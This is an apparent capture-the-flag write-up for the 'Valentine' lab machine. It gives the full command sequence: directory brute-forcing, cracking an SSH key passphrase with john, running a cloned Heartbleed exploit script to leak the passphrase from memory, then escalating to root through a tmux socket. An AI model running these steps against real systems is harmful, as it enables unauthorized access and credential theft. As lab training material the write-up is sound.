Valentine

Abusing SSL HeartBleed vulnerability - SSH Trouble Shooting - SUID Socket PrivEsc via tmux

Scanning

HTTP Enumeration

Viewing the source dint give me anything nor robots.txt file 

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.79

Viewing the /dev gives two important files, the encode and decode endpoints are just scripts run by the backend - Tried command injections there, but nothing worked :(

The hype_key is a hex encoded string

Let’s use an online tool to convert it to text - We find out that it is an RSA private key!

Changing the permissions and tried logging via ssh

chmod 400 hype_key
ssh -i hype_key hype@valentine.htb
hype_key's passphrase:

So now we need to figure the passphrase for this we can use ssh2john utility !

ssh2john hype_key > out
john out --wordlist=/opt/rockyou.txt
. . . . .

Nothing useful, john couldn't crack - BACK TO ENUMERATION :(

nmap --script vuln -oA vuln-scan 10.10.10.79

It is essentially a vulnerability in the popular OpenSSL cryptographic software library. This vulnerability allows anyone on the Internet to read the memory of the systems protected by this vulnerable version of OpenSSL. This can lead to the compromise of secret keys, passwords, information, etc. It also allows attackers to eavesdrop on communications.

Inorder to exploit this we can use this script

git clone https://gist.github.com/10174134.git

Let’s run the exploit with a loop number of 10

python heartbleed.py -p 443 -n 10 10.10.10.79

We get a base64 encoded string, when we decode it - we have the passphrase !

echo "aGVhcn.........." | base64 -d
heartbleedbeleievethehype

We can now log on to the box using ssh

ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key':
sign_and_send_pubkey: no mutual signature supported

Encountered this error and spent some time fixing this - the fix is 

ssh -o -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype_key hype@10.10.10.79

Privilege Escalation

Checked the .bash_history because it wasn't linked to /dev/null

ls -la /
cd .devs
ls -l dev_sess
tmux -S /.devs/dev_sess
exit

The file dev_sess was a socket file and it had a SUID bit to it - When we attached the socket process via tmux - We become root !

PreviousNodeNextPoison

Last updated